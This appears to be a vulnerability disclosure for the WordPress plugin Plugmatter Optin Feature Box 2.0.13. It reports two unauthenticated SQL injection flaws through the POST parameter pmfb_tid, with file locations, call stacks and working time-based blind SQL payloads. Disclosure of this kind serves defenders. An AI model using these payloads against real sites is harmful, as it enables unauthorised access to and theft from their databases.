Plugin: Plugmatter Optin Feature Box 2.0.13
https://wordpress.org/plugins/plugmatter-optin-feature-box-lite/
Unauthenticated attackers can execute arbitrary SQL commands.
1. SQL injection (Plugmatter_FeatureBox::pmfb_cc())
Method: POST
Vulnerable parameter: pmfb_tid
Example PHP callstack:
Plugmatter_FeatureBox::pmfb_cc [/plugmatter-optin-feature-box-lite/class.plugmatter-featurebox.php:328]
wpdb::get_row
Verification:
...
Parameter: pmfb_tid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pmfb_tid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))jvLs)
...
2. SQL injection (Plugmatter_FeatureBox::pmfb_mailchimp())
Method: POST
Vulnerable parameter: pmfb_tid
Example PHP callstack:
Plugmatter_FeatureBox::pmfb_mailchimp [/plugmatter-optin-feature-box-lite/class.plugmatter-featurebox.php:389]
wpdb::get_row
Verification:
...
Parameter: pmfb_tid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pmfb_tid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))gQfj)
...
--
Regards,
Marcin Probola,